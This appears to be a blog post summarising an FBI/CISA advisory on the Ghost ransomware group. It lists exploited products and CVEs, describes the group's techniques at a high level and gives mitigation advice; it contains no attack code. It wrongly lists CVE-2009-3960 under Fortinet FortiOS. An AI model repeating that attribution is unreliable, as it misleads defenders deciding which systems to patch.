CTI: Ghost in the Machine

Urgent Threat Advisory: Ghost Ransomware Campaign Targeting Backup Systems – Critical Infrastructure at Risk

Summary

A sophisticated cyber threat campaign known as Ghost (also known as Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture) has been actively targeting organizations across multiple industry sectors in over 70 countries. The FBI and CISA have issued a critical advisory warning about this ransomware group’s unique attack methodology. Unlike traditional ransomware campaigns that rely on phishing, Ghost focuses on exploiting known vulnerabilities in software and firmware to compromise backup systems and cripple an organization's ability to recover from attacks.

Key Attack Techniques

The Ghost ransomware group employs a multi-stage attack process, including:

  1. Exploitation of Vulnerabilities:

    • Ghost primarily targets unpatched vulnerabilities in publicly exposed applications and systems.

    • Notable products exploited include:

      • Fortinet FortiOS appliances

      • Adobe ColdFusion

      • Microsoft SharePoint

      • Microsoft Exchange (including the ProxyShell attack chain)

    • Notable CVEs targeted by Ghost:

      • CVE-2009-3960 (Fortinet FortiOS)

      • CVE-2010-2861 (Adobe ColdFusion)

      • CVE-2018-13379 (Fortinet VPN)

      • CVE-2019-0604 (Microsoft SharePoint)

      • CVE-2021-31207, CVE-2021-34473, CVE-2021-34523 (Microsoft Exchange ProxyShell)

  2. Web Shell Deployment:

    • After gaining access, attackers upload a web shell to compromised servers to maintain persistence.

  3. Privilege Escalation:

    • Attackers leverage Windows command prompts and PowerShell to escalate privileges, often impersonating the SYSTEM user.

  4. Cobalt Strike Abuse:

    • The group uses Cobalt Strike to deploy Beacons for command-and-control (C2) purposes and to execute additional malicious payloads.

    • Ghost actors use hashdump to collect credentials and passwords, disabling security defenses such as Windows Defender to evade detection.

  5. Targeting Backup Systems:

    • Ghost focuses on compromising and corrupting backup infrastructure to prevent organizations from recovering data without paying a ransom.

Industry Sectors Targeted

Ghost ransomware attacks have impacted critical infrastructure across multiple sectors, including:

  • Financial Institutions: Leading to operational disruptions and financial losses.

  • Municipal Governments: Service interruptions have affected entire communities.

  • Healthcare Organizations: The inability to restore critical patient data poses severe risks to patient care and operational continuity.

Impact and Observations

  • While Ghost often claims to exfiltrate data for sale, the FBI notes limited evidence of significant data theft (e.g., intellectual property or PII) beyond backup corruption.

  • The group appears focused on ensuring that recovery from attacks is impossible without paying a ransom or facing extended downtime.

Expert Insights

  1. Juliette Hudson, CTO at CybaVerse:

    • Emphasizes the importance of prioritizing patching and remediation efforts to mitigate risk from known vulnerabilities.

  2. Darren Guccione, CEO of Keeper Security:

    • Recommends proactive risk management, including the adoption of privileged access management and zero-trust frameworks.

  3. Joe Silva, CEO at Spektion:

    • Warns that “patch fatigue” and overwhelmed security teams create gaps that attackers are exploiting.

  4. Rom Carmel, CEO at Apono:

    • Highlights the importance of limiting privileges and enforcing precise, rightsized access to sensitive resources to reduce the impact of credential theft.

  5. Agnidipta Sarkar, VP CISO Advisory at ColorTokens:

    • Stresses the need to prevent lateral movement in networks by better understanding how attackers gain access.

  6. Tim Mackey, Head of Software Supply Chain Risk at Black Duck:

    • Advises organizations to create a long-term operations plan for legacy and IoT devices to ensure patch availability and active threat scenario sharing.

Recommended Mitigation Steps

The FBI recommends taking the following urgent actions to mitigate the risks posed by the Ghost ransomware campaign:

  1. Maintain Regular Backups:

    • Store backups separately from source systems so they cannot be altered or encrypted by compromised devices.

  2. Patch Known Vulnerabilities:

    • Apply security updates to operating systems, software, and firmware in a timely manner.

    • Prioritize patching of critical CVEs listed above.

  3. Segment Networks:

    • Restrict lateral movement from initial infected devices by segmenting networks.

  4. Implement Phishing-Resistant MFA:

    • Enforce multi-factor authentication (MFA) for all privileged accounts and email services to reduce the risk of account compromise.

  5. Least Privilege Access:

    • Implement a least-privilege access model to minimize access rights for accounts, users, and systems.

  6. Allow listing:

    • Allowlist applications, scripts, and network traffic to prevent unauthorized execution and access.

Conclusion

The Ghost ransomware campaign represents a dangerous escalation in ransomware tactics, focusing on disabling backup infrastructure and preventing recovery rather than merely encrypting data. Organizations must act quickly to patch vulnerabilities, segment their networks, and implement robust access controls to reduce the risk of falling victim to these attacks.

If you want to read more, this CTI summary is based on Davey Winder in the Forbes article here.



cybersecurityJay Twitchellransomeware, ghost, APT, cybercrime, Cyber Threat Intelligence, threat intelComment